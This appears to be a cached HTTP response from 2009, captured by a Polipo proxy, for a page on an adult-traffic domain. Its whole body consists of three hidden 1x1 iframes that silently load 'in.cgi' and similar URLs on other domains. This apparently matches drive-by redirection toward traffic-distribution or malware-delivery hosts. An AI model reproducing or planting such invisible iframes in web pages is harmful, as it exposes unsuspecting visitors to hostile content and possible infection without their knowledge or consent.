HTTP/1.1 200 OK
Content-Length: 353
Date: Mon, 16 Mar 2009 08:01:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.8
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
X-Polipo-Location: http://porn-money.org/spl/index.php
X-Polipo-Date: Mon, 16 Mar 2009 08:28:38 GMT
X-Polipo-Access: Mon, 16 Mar 2009 08:28:39 GMT

<iframe src='http://gujjipuzzi.net/in.cgi?pipka' width='1' height='1' style='visibility: hidden;'></iframe>
<iframe src='http://p0rn-movies.com/55/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
<html><body><iframe src="http://perfectnamestore.cn/in.cgi?income7" width=1 height=1 style="visibility: hidden"></iframe></body></html>
